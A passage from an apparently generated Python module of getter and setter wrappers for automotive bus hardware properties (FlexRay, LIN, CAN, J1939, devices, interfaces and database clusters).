# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MAX_DRIFT,
)
def set_session_intf_flex_ray_max_drift(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MAX_DRIFT,
value,
)
def get_session_intf_flex_ray_microtick(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MICROTICK,
)
def get_session_intf_flex_ray_null_to_in_strm(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_NULL_TO_IN_STRM,
)
def set_session_intf_flex_ray_null_to_in_strm(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_NULL_TO_IN_STRM,
value,
)
def get_session_intf_flex_ray_off_corr(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_OFF_CORR,
)
def get_session_intf_flex_ray_off_corr_out(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_OFF_CORR_OUT,
)
def set_session_intf_flex_ray_off_corr_out(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_OFF_CORR_OUT,
value,
)
def get_session_intf_flex_ray_rate_corr(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_RATE_CORR,
)
def get_session_intf_flex_ray_rate_corr_out(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_RATE_CORR_OUT,
)
def set_session_intf_flex_ray_rate_corr_out(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_RATE_CORR_OUT,
value,
)
def get_session_intf_flex_ray_samp_per_micro(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SAMP_PER_MICRO,
)
def set_session_intf_flex_ray_samp_per_micro(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SAMP_PER_MICRO,
value,
)
def get_session_intf_flex_ray_sing_slot_en(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SING_SLOT_EN,
)
def set_session_intf_flex_ray_sing_slot_en(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SING_SLOT_EN,
value,
)
def get_session_intf_flex_ray_statistics_en(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_STATISTICS_EN,
)
def set_session_intf_flex_ray_statistics_en(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_STATISTICS_EN,
value,
)
def get_session_intf_flex_ray_sym_to_in_strm(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYM_TO_IN_STRM,
)
def set_session_intf_flex_ray_sym_to_in_strm(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYM_TO_IN_STRM,
value,
)
def get_session_intf_flex_ray_sync_ch_a_even(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYNC_CH_A_EVEN,
)
def get_session_intf_flex_ray_sync_ch_a_odd(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYNC_CH_A_ODD,
)
def get_session_intf_flex_ray_sync_ch_b_even(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYNC_CH_B_EVEN,
)
def get_session_intf_flex_ray_sync_ch_b_odd(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYNC_CH_B_ODD,
)
def get_session_intf_flex_ray_sync_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYNC_STATUS,
)
def get_session_intf_flex_ray_term(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_TERM,
)
def set_session_intf_flex_ray_term(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_TERM,
value,
)
def get_session_intf_flex_ray_wakeup_ch(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_WAKEUP_CH,
)
def set_session_intf_flex_ray_wakeup_ch(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_WAKEUP_CH,
value,
)
def get_session_intf_flex_ray_wakeup_ptrn(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_WAKEUP_PTRN,
)
def set_session_intf_flex_ray_wakeup_ptrn(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_WAKEUP_PTRN,
value,
)
def set_session_intf_flex_ray_sleep(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SLEEP,
value,
)
def get_session_intf_flex_ray_connected_chs(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_CONNECTED_CHS,
)
def set_session_intf_flex_ray_connected_chs(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_CONNECTED_CHS,
value,
)
def get_session_intf_lin_break_length(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_BREAK_LENGTH,
)
def set_session_intf_lin_break_length(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_BREAK_LENGTH,
value,
)
def get_session_intf_lin_master(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_MASTER,
)
def set_session_intf_lin_master(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_MASTER,
value,
)
def get_session_intf_lin_sched_names(
ref, # type: int
):
# type: (...) -> typing.Iterable[typing.Text]
return _cprops.get_session_string_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_SCHED_NAMES,
)
def set_session_intf_lin_sleep(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_SLEEP,
value,
)
def get_session_intf_lin_term(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_TERM,
)
def set_session_intf_lin_term(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_TERM,
value,
)
def get_session_intf_lin_diag_p2min(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_DIAG_P_2MIN,
)
def set_session_intf_lin_diag_p2min(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_DIAG_P_2MIN,
value,
)
def get_session_intf_lin_diag_stmin(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_DIAG_S_TMIN,
)
def set_session_intf_lin_diag_stmin(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_DIAG_S_TMIN,
value,
)
def get_session_intf_lin_alw_start_wo_bus_pwr(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_ALW_START_WO_BUS_PWR,
)
def set_session_intf_lin_alw_start_wo_bus_pwr(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_ALW_START_WO_BUS_PWR,
value,
)
def get_session_intf_lin_ostr_slv_rsp_lst_by_nad(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_LINO_STR_SLV_RSP_LST_BY_NAD,
)
def set_session_intf_lin_ostr_slv_rsp_lst_by_nad(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_LINO_STR_SLV_RSP_LST_BY_NAD,
value,
)
def get_session_intf_lin_no_response_to_in_strm(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_NO_RESPONSE_TO_IN_STRM,
)
def set_session_intf_lin_no_response_to_in_strm(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_NO_RESPONSE_TO_IN_STRM,
value,
)
def get_session_intf_lin_checksum_to_in_strm(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_CHECKSUM_TO_IN_STRM,
)
def set_session_intf_lin_checksum_to_in_strm(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_CHECKSUM_TO_IN_STRM,
value,
)
def get_session_intf_src_term_start_trigger(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_session_string(
ref,
_cconsts.NX_PROP_SESSION_INTF_SRC_TERM_START_TRIGGER,
)
def set_session_intf_src_term_start_trigger(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_session_string(
ref,
_cconsts.NX_PROP_SESSION_INTF_SRC_TERM_START_TRIGGER,
value,
)
def get_session_j1939_address(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_ADDRESS,
)
def set_session_j1939_address(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_ADDRESS,
value,
)
def get_session_j1939_name(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u64(
ref,
_cconsts.NX_PROP_SESSION_J1939_NAME,
)
def set_session_j1939_name(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u64(
ref,
_cconsts.NX_PROP_SESSION_J1939_NAME,
value,
)
def set_session_j1939_ecu(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_ref(
ref,
_cconsts.NX_PROP_SESSION_J1939_ECU,
value,
)
def get_session_j1939_timeout_t1(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T1,
)
def set_session_j1939_timeout_t1(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T1,
value,
)
def get_session_j1939_timeout_t2(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T2,
)
def set_session_j1939_timeout_t2(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T2,
value,
)
def get_session_j1939_timeout_t3(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T3,
)
def set_session_j1939_timeout_t3(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T3,
value,
)
def get_session_j1939_timeout_t4(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T4,
)
def set_session_j1939_timeout_t4(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T4,
value,
)
def get_session_j1939_response_time_tr_sd(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_RESPONSE_TIME_TR_SD,
)
def set_session_j1939_response_time_tr_sd(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_RESPONSE_TIME_TR_SD,
value,
)
def get_session_j1939_response_time_tr_gd(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_RESPONSE_TIME_TR_GD,
)
def set_session_j1939_response_time_tr_gd(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_RESPONSE_TIME_TR_GD,
value,
)
def get_session_j1939_hold_time_th(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_HOLD_TIME_TH,
)
def set_session_j1939_hold_time_th(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_HOLD_TIME_TH,
value,
)
def get_session_j1939_num_packets_recv(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_NUM_PACKETS_RECV,
)
def set_session_j1939_num_packets_recv(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_NUM_PACKETS_RECV,
value,
)
def get_session_j1939_num_packets_resp(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_NUM_PACKETS_RESP,
)
def set_session_j1939_num_packets_resp(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_NUM_PACKETS_RESP,
value,
)
def get_session_j1939_max_repeat_cts(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_MAX_REPEAT_CTS,
)
def set_session_j1939_max_repeat_cts(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_MAX_REPEAT_CTS,
value,
)
def get_session_j1939_fill_byte(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_FILL_BYTE,
)
def set_session_j1939_fill_byte(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_FILL_BYTE,
value,
)
def get_session_j1939_write_queue_size(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_WRITE_QUEUE_SIZE,
)
def set_session_j1939_write_queue_size(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_WRITE_QUEUE_SIZE,
value,
)
def get_session_j1939_ecu_busy(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_J1939_ECU_BUSY,
)
def set_session_j1939_ecu_busy(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_J1939_ECU_BUSY,
value,
)
def get_session_j1939_include_dest_addr_in_pgn(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_J1939_INCLUDE_DEST_ADDR_IN_PGN,
)
def set_session_j1939_include_dest_addr_in_pgn(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_J1939_INCLUDE_DEST_ADDR_IN_PGN,
value,
)
def get_session_intf_can_edge_filter(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_EDGE_FILTER,
)
def set_session_intf_can_edge_filter(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_EDGE_FILTER,
value,
)
def get_session_intf_can_transmit_pause(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TRANSMIT_PAUSE,
)
def set_session_intf_can_transmit_pause(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TRANSMIT_PAUSE,
value,
)
def get_session_intf_can_disable_prot_exception_handling(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_DISABLE_PROT_EXCEPTION_HANDLING,
)
def set_session_intf_can_disable_prot_exception_handling(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_DISABLE_PROT_EXCEPTION_HANDLING,
value,
)
def set_session_can_start_time_off(
ref, # type: int
sub, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_sub_f64(
ref,
sub,
_cconsts.NX_PROP_SESSION_SUB_CAN_START_TIME_OFF,
value,
)
def set_session_can_tx_time(
ref, # type: int
sub, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_sub_f64(
ref,
sub,
_cconsts.NX_PROP_SESSION_SUB_CAN_TX_TIME,
value,
)
def set_session_skip_n_cyclic_frames(
ref, # type: int
sub, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_sub_u32(
ref,
sub,
_cconsts.NX_PROP_SESSION_SUB_SKIP_N_CYCLIC_FRAMES,
value,
)
def set_session_lin_tx_n_corrupted_chksums(
ref, # type: int
sub, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_sub_u32(
ref,
sub,
_cconsts.NX_PROP_SESSION_SUB_LIN_TX_N_CORRUPTED_CHKSUMS,
value,
)
def set_session_j1939_addr_filter(
ref, # type: int
sub, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_session_sub_string(
ref,
sub,
_cconsts.NX_PROP_SESSION_SUB_J1939_ADDR_FILTER,
value,
)
def get_system_dev_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SYS_DEV_REFS,
)
def get_system_intf_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SYS_INTF_REFS,
)
def get_system_intf_refs_can(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SYS_INTF_REFS_CAN,
)
def get_system_intf_refs_flex_ray(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SYS_INTF_REFS_FLEX_RAY,
)
def get_system_intf_refs_lin(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SYS_INTF_REFS_LIN,
)
def get_system_ver_build(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SYS_VER_BUILD,
)
def get_system_ver_major(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SYS_VER_MAJOR,
)
def get_system_ver_minor(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SYS_VER_MINOR,
)
def get_system_ver_phase(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SYS_VER_PHASE,
)
def get_system_ver_update(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SYS_VER_UPDATE,
)
def get_system_intf_refs_all(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SYS_INTF_REFS_ALL,
)
def get_device_form_fac(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_DEV_FORM_FAC,
)
def get_device_intf_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_DEV_INTF_REFS,
)
def get_device_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_session_string(
ref,
_cconsts.NX_PROP_DEV_NAME,
)
def get_device_num_ports(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_DEV_NUM_PORTS,
)
def get_device_product_num(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_DEV_PRODUCT_NUM,
)
def get_device_ser_num(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_DEV_SER_NUM,
)
def get_device_slot_num(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_DEV_SLOT_NUM,
)
def get_device_num_ports_all(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_DEV_NUM_PORTS_ALL,
)
def get_device_intf_refs_all(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_DEV_INTF_REFS_ALL,
)
def get_interface_dev_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_ref(
ref,
_cconsts.NX_PROP_INTF_DEV_REF,
)
def get_interface_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_session_string(
ref,
_cconsts.NX_PROP_INTF_NAME,
)
def get_interface_num(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_NUM,
)
def get_interface_port_num(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_PORT_NUM,
)
def get_interface_protocol(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_PROTOCOL,
)
def get_interface_can_term_cap(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_CAN_TERM_CAP,
)
def get_interface_can_tcvr_cap(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_CAN_TCVR_CAP,
)
def get_interface_dongle_state(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_DONGLE_STATE,
)
def get_interface_dongle_id(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_DONGLE_ID,
)
def get_interface_dongle_revision(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_DONGLE_REVISION,
)
def get_interface_dongle_firmware_version(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_DONGLE_FIRMWARE_VERSION,
)
def get_interface_dongle_compatible_revision(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_DONGLE_COMPATIBLE_REVISION,
)
def get_interface_dongle_compatible_firmware_version(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_DONGLE_COMPATIBLE_FIRMWARE_VERSION,
)
def get_database_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_DATABASE_NAME,
)
def get_database_clst_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_DATABASE_CLST_REFS,
)
def get_database_show_invalid_from_open(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_DATABASE_SHOW_INVALID_FROM_OPEN,
)
def set_database_show_invalid_from_open(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_DATABASE_SHOW_INVALID_FROM_OPEN,
value,
)
def get_cluster_baud_rate(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_BAUD_RATE,
)
def set_cluster_baud_rate(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_BAUD_RATE,
value,
)
def get_cluster_baud_rate64(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u64(
ref,
_cconsts.NX_PROP_CLST_BAUD_RATE64,
)
def set_cluster_baud_rate64(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u64(
ref,
_cconsts.NX_PROP_CLST_BAUD_RATE64,
value,
)
def get_cluster_comment(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_CLST_COMMENT,
)
def set_cluster_comment(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_CLST_COMMENT,
value,
)
def get_cluster_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_CONFIG_STATUS,
)
def get_cluster_database_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_CLST_DATABASE_REF,
)
def get_cluster_ecu_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_CLST_ECU_REFS,
)
def get_cluster_frm_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_CLST_FRM_REFS,
)
def get_cluster_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_CLST_NAME,
)
def set_cluster_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_CLST_NAME,
value,
)
def get_cluster_pdu_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_CLST_PDU_REFS,
)
def get_cluster_pdus_reqd(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_CLST_PDUS_REQD,
)
def get_cluster_protocol(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_PROTOCOL,
)
def set_cluster_protocol(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_PROTOCOL,
value,
)
def get_cluster_sig_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
